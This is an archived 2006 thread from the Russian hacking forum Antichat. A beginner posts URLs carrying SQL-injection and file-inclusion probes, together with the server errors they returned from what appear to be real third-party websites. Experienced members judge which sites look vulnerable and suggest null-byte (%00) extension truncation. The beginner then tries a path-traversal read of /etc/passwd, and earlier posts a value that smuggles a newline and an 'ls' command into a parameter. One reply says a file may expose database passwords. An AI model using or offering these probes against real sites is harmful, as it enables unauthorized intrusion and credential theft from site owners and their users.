Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
07.12.2006, 14:17
|
|
Новичок
Регистрация: 05.12.2006
Сообщений: 16
Провел на форуме:
24503
Репутация:
1
|
|
Помощь по SQL & PHP
В общем если такие ошибки возможен ли тут sql иньекция ?
1,
ndex.php?ID=-1'1699&CATEGORY=0-N-1'ews
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/sfl1/domains/2uk/public_html/story2.php on line 12
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in
/home/sfl1/domains/2uk/public_html/story2.php on line 17
*******************************************
2,
ain.php?pid=?Qalias=x%0a/bin/ls%20/
Warning: main(pages/?Qalias=x /bin/ls /.php): failed to open stream: No such file or directory in /var/www/clients/jus/main.php on line 97
Warning: main(): Failed opening 'pages/?Qalias=x /bin/ls /.php' for inclusion (include_path='.:/usr/share/pear') in /var/www/clients/just/main.php on line 97
********************************************
3,
/index.htm?id=-1'2518
Fatal error: Call to undefined method DB_Error::fetchInto() in /var/www/html/core/lib/classes/GO_DbObj.php on line 536
********************************************
?_m=news&_a=viewnews&newsid=-1'
Fatal error: Invalid News Item in /home/wwwdkho/public_html/support/modules/news/client_news.php on line 102
*********************************
4.
ndex.php?id='company/services
Warning: main(content/\'company/services.txt) [function.main]: failed to open stream: No such file or directory in /home/wav/public_html/index.php on line 186
Warning: main(content/\'company/services.txt) [function.main]: failed to open stream: No such file or directory in /home/wav/public_html/index.php on line 186
******************************************
И напоследок вот такое
/index.php?id_page=-1
При значение -1
Некаких ошибок нету. Просто Появлятеся белая страница ( инечегона ней нету)
**********************************
|
|
|
07.12.2006, 14:23
|
|
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814
Репутация:
3876
|
|
1. возможно sql-inj. По крайне мере раскрытие серверного пути на лицо 
2. возможно php-incude. Эххх.. попробовал бы %00, ain.php?pid=php-include вроде так.
3. вряд ли скуль.. просто ошибка в обработке данных. Но также во втором случае не исключена возможность sql-inj.
4. чистой воды локальный инклуд. Пробуй отсечь расширения - %00
про "напоследок".. это просто реакция такая на "плохой" параметр...скуль возможна. |
|
|
|
07.12.2006, 14:33
|
|
Новичок
Регистрация: 05.12.2006
Сообщений: 16
Провел на форуме:
24503
Репутация:
1
|
|
Сенк. Сейчас буду пробывать
|
|
|
|
07.12.2006, 14:35
|
|
Познающий
Регистрация: 09.10.2006
Сообщений: 92
Провел на форуме:
347686
Репутация:
87
|
|
Сообщение от Rebz
2. возможно php-incude. Эххх.. попробовал бы %00, ain.php?pid=php-include вроде так.
только локальный инклюд из /pages. %00 уместен.
3. Вызов неопределенного метода класса. При возможности глянуть на сам класс GO_DbObj.php
Последний раз редактировалось EXSlim; 07.12.2006 в 14:37..
|
|
|
|
07.12.2006, 14:43
|
|
Новичок
Регистрация: 05.12.2006
Сообщений: 16
Провел на форуме:
24503
Репутация:
1
|
|
А где можно поподробнее почитать про локальные инклюды?
Чтото инфы я так и ненашёл. а по мускульным инклюдам врое достаточно
|
|
|
|
07.12.2006, 14:51
|
|
Новичок
Регистрация: 05.12.2006
Сообщений: 16
Провел на форуме:
24503
Репутация:
1
|
|
Во вотором примере пробывал вот так
main.php?pid=?../../../../../../../etc/passwd%00
Warning: main(pages/?../../../../../../../etc/passwd\0.php): failed to open stream: No such file or directory in /var/www/clients/juааlar/main.php on line 97
|
|
|
|
07.12.2006, 15:05
|
|
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814
Репутация:
3876
|
|
значит %00 отпадает.. во-первых, убери вопросительный знак -) а во вторых пробуй разные пхп-файлы втсавлять без расширения пхп.. без ссылки сложно судить.. может даже там ниче и нет интересного
|
|
|
|
07.12.2006, 15:28
|
|
Новичок
Регистрация: 05.12.2006
Сообщений: 16
Провел на форуме:
24503
Репутация:
1
|
|
Сообщение от Rebz
значит %00 отпадает.. во-первых, убери вопросительный знак -) а во вторых пробуй разные пхп-файлы втсавлять без расширения пхп.. без ссылки сложно судить.. может даже там ниче и нет интересного
Можеш плиз в аську стукнутся 491104
|
|
|
|
07.12.2006, 15:42
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463
Репутация:
2258
|
|
можно инклудить токо то что в папке pages/
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|
|
07.12.2006, 16:26
|
|
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266
Репутация:
366
|
|
про локальные инклуды можешь почитать здесь http://forum.antichat.ru/threadnav22832-1-10.html
в 4 случае ты можешь просмотреть services.txt, вероятнее всего там php код. возможно там есть ошибки или пароли к бд.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
